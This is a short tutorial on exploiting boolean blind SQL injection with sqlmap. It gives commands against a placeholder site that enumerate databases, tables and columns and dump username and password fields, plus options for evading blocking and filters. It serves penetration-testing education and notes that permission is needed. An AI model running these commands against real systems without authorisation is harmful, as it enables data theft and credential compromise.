SQLi: Boolean Blind with sqlmap

TL;DR

This guide shows how to exploit a boolean blind SQL injection vulnerability using the sqlmap tool. We’ll cover identifying the vulnerability, setting up sqlmap for testing, and extracting data.

1. Understanding Boolean Blind SQL Injection

Boolean blind SQL injection happens when you can send queries to a web application, but only get a ‘true’ or ‘false’ response back – usually reflected in the page content changing or not. There’s no direct error message or data returned. This makes it harder to exploit than regular SQLi.

2. Identifying a Potential Vulnerability

Look for parameters in URLs that seem to affect database behaviour. Try adding single quotes (‘) to these parameters and see if the response changes. If it does, you might have an injection point. For example:

https://example.com/page?id=1

Try:

https://example.com/page?id=1'

If the page behaves differently, it suggests SQLi is possible.

3. Setting up sqlmap

• Install sqlmap: Follow the instructions on the official sqlmap website for your operating system.
• Basic Syntax: The core command is sqlmap -u <URL>. Replace <URL> with the target URL.

4. Running sqlmap

Let’s assume our vulnerable URL is https://example.com/page?id=1.

1. Initial Scan: Start a basic scan to identify the injection point and database type:

sqlmap -u "https://example.com/page?id=1" --dbs

sqlmap will automatically try different payloads.

2. Specifying the Injection Point (if needed): If sqlmap doesn’t detect the parameter, use -p <parameter>. For example:

   sqlmap -u "https://example.com/page?id=1" -p id --dbs

3. Database Enumeration: The --dbs option lists the available databases.
4. Table Enumeration: Once you know a database name (e.g., ‘users’), list its tables:

sqlmap -u "https://example.com/page?id=1" -D users --tables

5. Column Enumeration: To see the columns in a table (e.g., ‘accounts’):

sqlmap -u "https://example.com/page?id=1" -D users -T accounts --columns

6. Data Dumping: Finally, dump the data from specific columns:

sqlmap -u "https://example.com/page?id=1" -D users -T accounts -C username,password --dump

5. Dealing with Boolean Blind Injection Specifically

• Time-Based Blind SQLi: If the boolean blind injection is very slow, try time-based injection using --time-sec <seconds> and --delay <seconds>.
• Random Agent: Use --random-agent to avoid being blocked by the server.
• Tamper Scripts: sqlmap has tamper scripts that can help bypass filters. Explore them with --tamper <script_name> (e.g., --tamper space2comment).

6. Important Considerations

• Legal: Only test on systems you have permission to assess.
• Resource Intensive: Boolean blind SQLi can be slow and require many requests. Be mindful of server load.
• Error Handling: sqlmap provides detailed error messages – read them carefully!